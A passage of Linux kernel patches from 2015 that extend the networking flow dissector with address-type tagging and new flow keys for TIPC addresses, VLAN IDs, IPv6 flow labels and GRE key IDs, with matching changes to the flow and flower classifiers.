+221,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, target_container); memcpy(key_ipv6_addrs, &iph->saddr, sizeof(*key_ipv6_addrs)); + key_control->addr_type = FLOW_DISSECTOR_KEY_IPV6_ADDRS; goto flow_label; } break; @@ -292,8 +298,9 @@ bool __skb_flow_dissect(const struct sk_buff *skb, key_addrs = skb_flow_dissector_target(flow_dissector, FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, target_container); - key_addrs->src = hdr->srcnode; - key_addrs->dst = 0; + key_addrs->v4addrs.src = hdr->srcnode; + key_addrs->v4addrs.dst = 0; + key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; } return true; } @@ -389,21 +396,88 @@ static inline void *flow_keys_hash_start(struct flow_keys *flow) static inline size_t flow_keys_hash_length(struct flow_keys *flow) { + size_t diff = FLOW_KEYS_HASH_OFFSET + sizeof(flow->addrs); BUILD_BUG_ON((sizeof(*flow) - FLOW_KEYS_HASH_OFFSET) % sizeof(u32)); - return (sizeof(*flow) - FLOW_KEYS_HASH_OFFSET) / sizeof(u32); + BUILD_BUG_ON(offsetof(typeof(*flow), addrs) != + sizeof(*flow) - sizeof(flow->addrs)); + + switch (flow->control.addr_type) { + case FLOW_DISSECTOR_KEY_IPV4_ADDRS: + diff -= sizeof(flow->addrs.v4addrs); + break; + case FLOW_DISSECTOR_KEY_IPV6_ADDRS: + diff -= sizeof(flow->addrs.v6addrs); + break; + } + return (sizeof(*flow) - diff) / sizeof(u32); +} + +__be32 flow_get_u32_src(const struct flow_keys *flow) +{ + switch (flow->control.addr_type) { + case FLOW_DISSECTOR_KEY_IPV4_ADDRS: + return flow->addrs.v4addrs.src; + case FLOW_DISSECTOR_KEY_IPV6_ADDRS: + return (__force __be32)ipv6_addr_hash( + &flow->addrs.v6addrs.src); + default: + return 0; + } +} +EXPORT_SYMBOL(flow_get_u32_src); + +__be32 flow_get_u32_dst(const struct flow_keys *flow) +{ + switch (flow->control.addr_type) { + case FLOW_DISSECTOR_KEY_IPV4_ADDRS: + return flow->addrs.v4addrs.dst; + case FLOW_DISSECTOR_KEY_IPV6_ADDRS: + return (__force __be32)ipv6_addr_hash( + &flow->addrs.v6addrs.dst); + default: + return 0; + } +} +EXPORT_SYMBOL(flow_get_u32_dst); + +static inline void __flow_hash_consistentify(struct flow_keys *keys) +{ + int addr_diff, i; + + switch (keys->control.addr_type) { + case FLOW_DISSECTOR_KEY_IPV4_ADDRS: + addr_diff = (__force u32)keys->addrs.v4addrs.dst - + (__force u32)keys->addrs.v4addrs.src; + if ((addr_diff < 0) || + (addr_diff == 0 && + 
((__force u16)keys->ports.dst < + (__force u16)keys->ports.src))) { + swap(keys->addrs.v4addrs.src, keys->addrs.v4addrs.dst); + swap(keys->ports.src, keys->ports.dst); + } + break; + case FLOW_DISSECTOR_KEY_IPV6_ADDRS: + addr_diff = memcmp(&keys->addrs.v6addrs.dst, + &keys->addrs.v6addrs.src, + sizeof(keys->addrs.v6addrs.dst)); + if ((addr_diff < 0) || + (addr_diff == 0 && + ((__force u16)keys->ports.dst < + (__force u16)keys->ports.src))) { + for (i = 0; i < 4; i++) + swap(keys->addrs.v6addrs.src.s6_addr32[i], + keys->addrs.v6addrs.dst.s6_addr32[i]); + swap(keys->ports.src, keys->ports.dst); + } + break; + } } static inline u32 __flow_hash_from_keys(struct flow_keys *keys, u32 keyval) { u32 hash; - /* get a consistent hash (same value on both flow directions) */ - if (((__force u32)keys->addrs.dst < (__force u32)keys->addrs.src) || - (((__force u32)keys->addrs.dst == (__force u32)keys->addrs.src) && - ((__force u16)keys->ports.dst < (__force u16)keys->ports.src))) { - swap(keys->addrs.dst, keys->addrs.src); - swap(keys->ports.src, keys->ports.dst); - } + __flow_hash_consistentify(keys); hash = __flow_hash_words((u32 *)flow_keys_hash_start(keys), flow_keys_hash_length(keys), keyval); @@ -451,8 +525,8 @@ void make_flow_keys_digest(struct flow_keys_digest *digest, data->n_proto = flow->basic.n_proto; data->ip_proto = flow->basic.ip_proto; data->ports = flow->ports.ports; - data->src = flow->addrs.src; - data->dst = flow->addrs.dst; + data->src = flow->addrs.v4addrs.src; + data->dst = flow->addrs.v4addrs.dst; } EXPORT_SYMBOL(make_flow_keys_digest); @@ -566,11 +640,15 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { }, { .key_id = FLOW_DISSECTOR_KEY_IPV4_ADDRS, - .offset = offsetof(struct flow_keys, addrs), + .offset = offsetof(struct flow_keys, addrs.v4addrs), + }, + { + .key_id = FLOW_DISSECTOR_KEY_IPV6_ADDRS, + .offset = offsetof(struct flow_keys, addrs.v6addrs), }, { .key_id = FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, - .offset = offsetof(struct flow_keys, addrs), + .offset = offsetof(struct flow_keys, addrs.v4addrs), }, { .key_id = FLOW_DISSECTOR_KEY_PORTS, diff --git a/net/ethernet/eth.c b/net/ethernet/eth.c index 7d0e239a6755..77e0f0e7a88e 100644 --- a/net/ethernet/eth.c +++ b/net/ethernet/eth.c @@ -133,7 +133,7 @@ u32 eth_get_headlen(void *data, unsigned int len) /* parse any remaining L2/L3 headers, check for L4 */ if (!skb_flow_dissect_flow_keys_buf(&keys, data, eth->h_proto, sizeof(*eth), len)) - return max_t(u32, keys.basic.thoff, sizeof(*eth)); + return max_t(u32, keys.control.thoff, sizeof(*eth)); /* parse for any L4 headers */ return min_t(u32, __skb_get_poff(NULL, data, &keys, len), len); diff --git a/net/sched/cls_flow.c b/net/sched/cls_flow.c index b4359924846c..76bc3a20ffdb 100644 --- a/net/sched/cls_flow.c +++ b/net/sched/cls_flow.c @@ -68,15 +68,21 @@ static inline u32 addr_fold(void *addr) static u32 flow_get_src(const struct sk_buff *skb, const struct flow_keys *flow) { - if (flow->addrs.src) - return ntohl(flow->addrs.src); + __be32 src = flow_get_u32_src(flow); + + if (src) + return ntohl(src); + return addr_fold(skb->sk); } static u32 flow_get_dst(const struct sk_buff *skb, const struct flow_keys *flow) { - if (flow->addrs.dst) - return ntohl(flow->addrs.dst); + __be32 dst = flow_get_u32_dst(flow); + + if (dst) + return ntohl(dst); + return addr_fold(skb_dst(skb)) ^ (__force u16) tc_skb_protocol(skb); } diff --git a/net/sched/cls_flower.c b/net/sched/cls_flower.c index 5a7d66c59684..b92d3f49c23e 100644 --- a/net/sched/cls_flower.c +++ 
b/net/sched/cls_flower.c @@ -28,8 +28,9 @@ struct fl_flow_key { struct flow_dissector_key_control control; struct flow_dissector_key_basic basic; struct flow_dissector_key_eth_addrs eth; + struct flow_dissector_key_addrs ipaddrs; union { - struct flow_dissector_key_addrs ipv4; + struct flow_dissector_key_ipv4_addrs ipv4; struct flow_dissector_key_ipv6_addrs ipv6; }; struct flow_dissector_key_ports tp; @@ -260,14 +261,14 @@ static int fl_set_key(struct net *net, struct nlattr **tb, &mask->basic.ip_proto, TCA_FLOWER_UNSPEC, sizeof(key->basic.ip_proto)); } - if (key->basic.n_proto == htons(ETH_P_IP)) { + if (key->control.addr_type == FLOW_DISSECTOR_KEY_IPV4_ADDRS) { fl_set_key_val(tb, &key->ipv4.src, TCA_FLOWER_KEY_IPV4_SRC, &mask->ipv4.src, TCA_FLOWER_KEY_IPV4_SRC_MASK, sizeof(key->ipv4.src)); fl_set_key_val(tb, &key->ipv4.dst, TCA_FLOWER_KEY_IPV4_DST, &mask->ipv4.dst, TCA_FLOWER_KEY_IPV4_DST_MASK, sizeof(key->ipv4.dst)); - } else if (key->basic.n_proto == htons(ETH_P_IPV6)) { + } else if (key->control.addr_type == FLOW_DISSECTOR_KEY_IPV6_ADDRS) { fl_set_key_val(tb, &key->ipv6.src, TCA_FLOWER_KEY_IPV6_SRC, &mask->ipv6.src, TCA_FLOWER_KEY_IPV6_SRC_MASK, sizeof(key->ipv6.src)); @@ -610,7 +611,7 @@ static int fl_dump(struct net *net, struct tcf_proto *tp, unsigned long fh, sizeof(key->basic.ip_proto))) goto nla_put_failure; - if (key->basic.n_proto == htons(ETH_P_IP) && + if (key->control.addr_type == FLOW_DISSECTOR_KEY_IPV4_ADDRS && (fl_dump_key_val(skb, &key->ipv4.src, TCA_FLOWER_KEY_IPV4_SRC, &mask->ipv4.src, TCA_FLOWER_KEY_IPV4_SRC_MASK, sizeof(key->ipv4.src)) || @@ -618,7 +619,7 @@ static int fl_dump(struct net *net, struct tcf_proto *tp, unsigned long fh, &mask->ipv4.dst, TCA_FLOWER_KEY_IPV4_DST_MASK, sizeof(key->ipv4.dst)))) goto nla_put_failure; - else if (key->basic.n_proto == htons(ETH_P_IPV6) && + else if (key->control.addr_type == FLOW_DISSECTOR_KEY_IPV6_ADDRS && (fl_dump_key_val(skb, &key->ipv6.src, TCA_FLOWER_KEY_IPV6_SRC, &mask->ipv6.src, TCA_FLOWER_KEY_IPV6_SRC_MASK, sizeof(key->ipv6.src)) || From 9f24908901c5f4b1e3b07548106b1790af933476 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:41 -0700 Subject: [PATCH 701/872] net: Add keys for TIPC address Add a new flow key for TIPC addresses. Signed-off-by: Tom Herbert Signed-off-by: David S. 
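The flow_keys address storage is a union of the possible families (IPv4, IPv6, and now TIPC), with control.addr_type recording which member is valid; accessors such as flow_get_u32_src() switch on that tag. A minimal userspace sketch of the tagged-union idea; the type and function names below are made up for illustration and are not the kernel structures:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum addr_type { ADDR_IPV4, ADDR_IPV6, ADDR_TIPC };

struct key_addrs {
	enum addr_type type;                    /* mirrors key_control->addr_type */
	union {
		struct { uint32_t src, dst; } v4;
		struct { uint8_t src[16], dst[16]; } v6;
		struct { uint32_t srcnode; } tipc;
	};
};

/* roughly the shape of flow_get_u32_src(): fold whichever family is
 * stored down to one 32-bit value usable for hashing/classification */
static uint32_t get_u32_src(const struct key_addrs *a)
{
	uint32_t v = 0;
	size_t i;

	switch (a->type) {
	case ADDR_IPV4:
		return a->v4.src;
	case ADDR_IPV6:
		for (i = 0; i < 16; i += 4) {
			uint32_t w;

			memcpy(&w, a->v6.src + i, 4);
			v ^= w;                 /* xor-fold, like ipv6_addr_hash() */
		}
		return v;
	case ADDR_TIPC:
		return a->tipc.srcnode;
	}
	return 0;
}

int main(void)
{
	struct key_addrs a = { .type = ADDR_TIPC, .tipc = { .srcnode = 0x01001001 } };

	printf("src fold = 0x%08x\n", (unsigned)get_u32_src(&a));
	return 0;
}

Keeping the tag in the control key rather than inferring it from n_proto is what lets later patches dispatch on address family independently of the link-layer protocol.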
Miller --- include/net/flow_dissector.h | 10 ++++++++++ net/core/flow_dissector.c | 18 +++++++++++++----- 2 files changed, 23 insertions(+), 5 deletions(-) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 306d4613abbb..3ee606a54775 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -49,6 +49,14 @@ struct flow_dissector_key_ipv6_addrs { struct in6_addr dst; }; +/** + * struct flow_dissector_key_tipc_addrs: + * @srcnode: source node address + */ +struct flow_dissector_key_tipc_addrs { + __be32 srcnode; +}; + /** * struct flow_dissector_key_addrs: * @v4addrs: IPv4 addresses @@ -58,6 +66,7 @@ struct flow_dissector_key_addrs { union { struct flow_dissector_key_ipv4_addrs v4addrs; struct flow_dissector_key_ipv6_addrs v6addrs; + struct flow_dissector_key_tipc_addrs tipcaddrs; }; }; @@ -97,6 +106,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, /* struct flow_dissector_key_addrs */ FLOW_DISSECTOR_KEY_PORTS, /* struct flow_dissector_key_ports */ FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ + FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ FLOW_DISSECTOR_KEY_MAX, }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index ca9d22488cfb..91861c3d45a7 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -294,13 +294,12 @@ bool __skb_flow_dissect(const struct sk_buff *skb, key_control->thoff = (u16)nhoff; if (skb_flow_dissector_uses_key(flow_dissector, - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS)) { + FLOW_DISSECTOR_KEY_TIPC_ADDRS)) { key_addrs = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, + FLOW_DISSECTOR_KEY_TIPC_ADDRS, target_container); - key_addrs->v4addrs.src = hdr->srcnode; - key_addrs->v4addrs.dst = 0; - key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; + key_addrs->tipcaddrs.srcnode = hdr->srcnode; + key_control->addr_type = FLOW_DISSECTOR_KEY_TIPC_ADDRS; } return true; } @@ -408,6 +407,9 @@ static inline size_t flow_keys_hash_length(struct flow_keys *flow) case FLOW_DISSECTOR_KEY_IPV6_ADDRS: diff -= sizeof(flow->addrs.v6addrs); break; + case FLOW_DISSECTOR_KEY_TIPC_ADDRS: + diff -= sizeof(flow->addrs.tipcaddrs); + break; } return (sizeof(*flow) - diff) / sizeof(u32); } @@ -420,6 +422,8 @@ __be32 flow_get_u32_src(const struct flow_keys *flow) case FLOW_DISSECTOR_KEY_IPV6_ADDRS: return (__force __be32)ipv6_addr_hash( &flow->addrs.v6addrs.src); + case FLOW_DISSECTOR_KEY_TIPC_ADDRS: + return flow->addrs.tipcaddrs.srcnode; default: return 0; } @@ -650,6 +654,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, .offset = offsetof(struct flow_keys, addrs.v4addrs), }, + { + .key_id = FLOW_DISSECTOR_KEY_TIPC_ADDRS, + .offset = offsetof(struct flow_keys, addrs.tipcaddrs), + }, { .key_id = FLOW_DISSECTOR_KEY_PORTS, .offset = offsetof(struct flow_keys, ports), From 45b47fd00ca14df869979dbbe14324625ec93552 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:42 -0700 Subject: [PATCH 702/872] net: Get rid of IPv6 hash addresses flow keys We don't need to return the IPv6 address hash as part of flow keys. In general, using the IPv6 address hash is risky in a hash value since the underlying use of xor provides no entropy. If someone really needs the hash value they can get it from the full IPv6 addresses in flow keys (e.g. from flow_get_u32_src). Signed-off-by: Tom Herbert Signed-off-by: David S. 
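The "xor provides no entropy" point can be seen directly: two different address pairs can xor-fold to the same 32-bit value, so hashing the folded value discards information that hashing the full addresses keeps. A toy, self-contained demonstration with made-up address words:

#include <stdint.h>
#include <stdio.h>

/* xor-fold of a 128-bit address into 32 bits, the operation that
 * ipv6_addr_hash() is built on */
static uint32_t xor_fold(const uint32_t a[4])
{
	return a[0] ^ a[1] ^ a[2] ^ a[3];
}

int main(void)
{
	uint32_t addr1[4] = { 1, 2, 3, 4 };
	uint32_t addr2[4] = { 4, 3, 2, 1 };     /* clearly a different address */

	/* both fold to 4: the fold alone cannot tell these flows apart */
	printf("fold(addr1) = %u, fold(addr2) = %u\n",
	       (unsigned)xor_fold(addr1), (unsigned)xor_fold(addr2));
	return 0;
}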
Miller --- include/net/flow_dissector.h | 1 - net/core/flow_dissector.c | 17 ----------------- 2 files changed, 18 deletions(-) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 3ee606a54775..59f00f90fc6b 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -103,7 +103,6 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_BASIC, /* struct flow_dissector_key_basic */ FLOW_DISSECTOR_KEY_IPV4_ADDRS, /* struct flow_dissector_key_ipv4_addrs */ FLOW_DISSECTOR_KEY_IPV6_ADDRS, /* struct flow_dissector_key_ipv6_addrs */ - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, /* struct flow_dissector_key_addrs */ FLOW_DISSECTOR_KEY_PORTS, /* struct flow_dissector_key_ports */ FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 91861c3d45a7..5348a468de78 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -199,19 +199,6 @@ bool __skb_flow_dissect(const struct sk_buff *skb, ip_proto = iph->nexthdr; nhoff += sizeof(struct ipv6hdr); - if (skb_flow_dissector_uses_key(flow_dissector, - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS)) { - key_addrs = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, - target_container); - - key_addrs->v4addrs.src = - (__force __be32)ipv6_addr_hash(&iph->saddr); - key_addrs->v4addrs.dst = - (__force __be32)ipv6_addr_hash(&iph->daddr); - key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; - goto flow_label; - } if (skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_IPV6_ADDRS)) { struct flow_dissector_key_ipv6_addrs *key_ipv6_addrs; @@ -650,10 +637,6 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_IPV6_ADDRS, .offset = offsetof(struct flow_keys, addrs.v6addrs), }, - { - .key_id = FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, - .offset = offsetof(struct flow_keys, addrs.v4addrs), - }, { .key_id = FLOW_DISSECTOR_KEY_TIPC_ADDRS, .offset = offsetof(struct flow_keys, addrs.tipcaddrs), From d34af823ff401c312541aa613c49ea4b872bde9e Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:43 -0700 Subject: [PATCH 703/872] net: Add VLAN ID to flow_keys In flow_dissector set vlan_id in flow_keys when VLAN is found. Signed-off-by: Tom Herbert Signed-off-by: David S. 
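The VLAN ID stored here is the low 12 bits of the 16-bit 802.1Q TCI; skb_vlan_tag_get_id() masks off the PCP/DEI bits, which is why a 12-bit field in flow_dissector_key_tags is enough. A standalone sketch of that extraction; the sample TCI value is made up:

#include <stdint.h>
#include <stdio.h>

#define VLAN_VID_MASK 0x0fff            /* low 12 bits: VLAN ID */

int main(void)
{
	uint16_t tci = 0xa064;          /* PCP 5, DEI 0, VID 100 */

	printf("vlan_id = %u, pcp = %u\n",
	       tci & VLAN_VID_MASK, tci >> 13);
	return 0;
}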
Miller --- include/net/flow_dissector.h | 6 ++++++ net/core/flow_dissector.c | 14 ++++++++++++++ 2 files changed, 20 insertions(+) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 59f00f90fc6b..08480fbb9035 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -27,6 +27,10 @@ struct flow_dissector_key_basic { u8 padding; }; +struct flow_dissector_key_tags { + u32 vlan_id:12; +}; + /** * struct flow_dissector_key_ipv4_addrs: * @src: source ip address @@ -106,6 +110,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_PORTS, /* struct flow_dissector_key_ports */ FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ + FLOW_DISSECTOR_KEY_VLANID, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_MAX, }; @@ -142,6 +147,7 @@ struct flow_keys { struct flow_dissector_key_control control; #define FLOW_KEYS_HASH_START_FIELD basic struct flow_dissector_key_basic basic; + struct flow_dissector_key_tags tags; struct flow_dissector_key_ports ports; struct flow_dissector_key_addrs addrs; }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 5348a468de78..5c66cb2e66df 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -126,6 +126,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, struct flow_dissector_key_basic *key_basic; struct flow_dissector_key_addrs *key_addrs; struct flow_dissector_key_ports *key_ports; + struct flow_dissector_key_tags *key_tags; u8 ip_proto; if (!data) { @@ -246,6 +247,15 @@ bool __skb_flow_dissect(const struct sk_buff *skb, if (!vlan) return false; + if (skb_flow_dissector_uses_key(flow_dissector, + FLOW_DISSECTOR_KEY_VLANID)) { + key_tags = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_VLANID, + target_container); + + key_tags->vlan_id = skb_vlan_tag_get_id(skb); + } + proto = vlan->h_vlan_encapsulated_proto; nhoff += sizeof(*vlan); goto again; @@ -645,6 +655,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_PORTS, .offset = offsetof(struct flow_keys, ports), }, + { + .key_id = FLOW_DISSECTOR_KEY_VLANID, + .offset = offsetof(struct flow_keys, tags), + }, }; static const struct flow_dissector_key flow_keys_buf_dissector_keys[] = { From 87ee9e52ffeb168803a76cc07734425227cc2268 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:44 -0700 Subject: [PATCH 704/872] net: Add IPv6 flow label to flow_keys In flow_dissector set the flow label in flow_keys for IPv6. This also removes the shortcircuiting of flow dissection when a non-zero label is present, the flow label can be considered to provide additional entropy for a hash. Signed-off-by: Tom Herbert Signed-off-by: David S. 
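The flow label occupies the low 20 bits of the first 32-bit word of the IPv6 header (version:4, traffic class:8, flow label:20); ip6_flowlabel() masks those bits out in network order and the dissector stores them host-ordered via ntohl(), hence the 20-bit field in flow_dissector_key_tags. A minimal sketch of the bit layout; the sample header word is made up:

#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>

int main(void)
{
	/* first 32-bit word of an IPv6 header in network order:
	 * version = 6, traffic class = 0, flow label = 0x12345 */
	uint32_t first_word = htonl((6u << 28) | 0x12345);
	uint32_t host = ntohl(first_word);

	printf("version=%u tclass=%u flow_label=0x%05x\n",
	       (unsigned)(host >> 28),
	       (unsigned)((host >> 20) & 0xff),
	       (unsigned)(host & 0xfffff));
	return 0;
}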
Miller --- include/net/flow_dissector.h | 4 +++- net/core/flow_dissector.c | 29 ++++++++++------------------- 2 files changed, 13 insertions(+), 20 deletions(-) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 08480fbb9035..14d8483d836e 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -28,7 +28,8 @@ struct flow_dissector_key_basic { }; struct flow_dissector_key_tags { - u32 vlan_id:12; + u32 vlan_id:12, + flow_label:20; }; /** @@ -111,6 +112,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ FLOW_DISSECTOR_KEY_VLANID, /* struct flow_dissector_key_flow_tags */ + FLOW_DISSECTOR_KEY_FLOW_LABEL, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_MAX, }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 5c66cb2e66df..70f0567b6be9 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -210,30 +210,17 @@ bool __skb_flow_dissect(const struct sk_buff *skb, memcpy(key_ipv6_addrs, &iph->saddr, sizeof(*key_ipv6_addrs)); key_control->addr_type = FLOW_DISSECTOR_KEY_IPV6_ADDRS; - goto flow_label; } - break; -flow_label: + flow_label = ip6_flowlabel(iph); if (flow_label) { - /* Awesome, IPv6 packet has a flow label so we can - * use that to represent the ports without any - * further dissection. - */ - - key_basic->n_proto = proto; - key_basic->ip_proto = ip_proto; - key_control->thoff = (u16)nhoff; - if (skb_flow_dissector_uses_key(flow_dissector, - FLOW_DISSECTOR_KEY_PORTS)) { - key_ports = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_PORTS, - target_container); - key_ports->ports = flow_label; + FLOW_DISSECTOR_KEY_FLOW_LABEL)) { + key_tags = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_FLOW_LABEL, + target_container); + key_tags->flow_label = ntohl(flow_label); } - - return true; } break; @@ -659,6 +646,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_VLANID, .offset = offsetof(struct flow_keys, tags), }, + { + .key_id = FLOW_DISSECTOR_KEY_FLOW_LABEL, + .offset = offsetof(struct flow_keys, tags), + }, }; static const struct flow_dissector_key flow_keys_buf_dissector_keys[] = { From 1fdd512c92003cf2d671ba22753d13302bf8cd1d Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:45 -0700 Subject: [PATCH 705/872] net: Add GRE keyid in flow_keys In flow dissector if a GRE header contains a keyid this is saved in the new keyid field of flow_keys. The GRE keyid is then represented in the flow hash function input. Signed-off-by: Tom Herbert Signed-off-by: David S. 
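The GRE key sits after the base 4-byte header and, when the C bit is set, after a further 4 bytes of checksum/reserved, which is why the parser advances nhoff in 4-byte steps before reading the key. A standalone sketch of the same offset arithmetic over a raw buffer; flag bit values follow RFC 2784/2890 and the sample packet is made up:

#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GRE_CSUM 0x8000
#define GRE_KEY  0x2000
#define GRE_SEQ  0x1000

int main(void)
{
	/* GRE header: flags|version, protocol, checksum + reserved1, key */
	uint8_t pkt[] = {
		0xa0, 0x00,             /* C and K bits set */
		0x08, 0x00,             /* protocol: IPv4 */
		0x00, 0x00, 0x00, 0x00, /* checksum + reserved1 */
		0xde, 0xad, 0xbe, 0xef, /* key */
	};
	uint16_t flags;
	uint32_t key;
	size_t off = 4;                 /* base header */

	memcpy(&flags, pkt, 2);
	flags = ntohs(flags);

	if (flags & GRE_CSUM)
		off += 4;               /* skip checksum + reserved1 */
	if (flags & GRE_KEY) {
		memcpy(&key, pkt + off, 4);
		printf("GRE key id = 0x%08x\n", (unsigned)ntohl(key));
		off += 4;
	}
	if (flags & GRE_SEQ)
		off += 4;               /* sequence number would follow */

	printf("payload starts at offset %zu\n", off);
	return 0;
}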
Miller --- include/net/flow_dissector.h | 6 ++++++ net/core/flow_dissector.c | 24 +++++++++++++++++++++++- 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 14d8483d836e..6c5e8d262607 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -32,6 +32,10 @@ struct flow_dissector_key_tags { flow_label:20; }; +struct flow_dissector_key_keyid { + __be32 keyid; +}; + /** * struct flow_dissector_key_ipv4_addrs: * @src: source ip address @@ -113,6 +117,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_TIPC_ADDRS, /* struct flow_dissector_key_tipc_addrs */ FLOW_DISSECTOR_KEY_VLANID, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_FLOW_LABEL, /* struct flow_dissector_key_flow_tags */ + FLOW_DISSECTOR_KEY_GRE_KEYID, /* struct flow_dissector_key_keyid */ FLOW_DISSECTOR_KEY_MAX, }; @@ -150,6 +155,7 @@ struct flow_keys { #define FLOW_KEYS_HASH_START_FIELD basic struct flow_dissector_key_basic basic; struct flow_dissector_key_tags tags; + struct flow_dissector_key_keyid keyid; struct flow_dissector_key_ports ports; struct flow_dissector_key_addrs addrs; }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 70f0567b6be9..7ddc0a7b3da5 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -127,6 +127,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, struct flow_dissector_key_addrs *key_addrs; struct flow_dissector_key_ports *key_ports; struct flow_dissector_key_tags *key_tags; + struct flow_dissector_key_keyid *key_keyid; u8 ip_proto; if (!data) { @@ -315,8 +316,25 @@ bool __skb_flow_dissect(const struct sk_buff *skb, nhoff += 4; if (hdr->flags & GRE_CSUM) nhoff += 4; - if (hdr->flags & GRE_KEY) + if (hdr->flags & GRE_KEY) { + const __be32 *keyid; + __be32 _keyid; + + keyid = __skb_header_pointer(skb, nhoff, sizeof(_keyid), + data, hlen, &_keyid); + + if (!keyid) + return false; + + if (skb_flow_dissector_uses_key(flow_dissector, + FLOW_DISSECTOR_KEY_GRE_KEYID)) { + key_keyid = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_GRE_KEYID, + target_container); + key_keyid->keyid = *keyid; + } nhoff += 4; + } if (hdr->flags & GRE_SEQ) nhoff += 4; if (proto == htons(ETH_P_TEB)) { @@ -650,6 +668,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { .key_id = FLOW_DISSECTOR_KEY_FLOW_LABEL, .offset = offsetof(struct flow_keys, tags), }, + { + .key_id = FLOW_DISSECTOR_KEY_GRE_KEYID, + .offset = offsetof(struct flow_keys, keyid), + }, }; static const struct flow_dissector_key flow_keys_buf_dissector_keys[] = { From b3baa0fbd02a1a9d493d8cb92ae4a4491b9e9d13 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:46 -0700 Subject: [PATCH 706/872] mpls: Add MPLS entropy label in flow_keys In flow dissector if an MPLS header contains an entropy label this is saved in the new keyid field of flow_keys. The entropy label is then represented in the flow hash function input. Signed-off-by: Tom Herbert Signed-off-by: David S. 
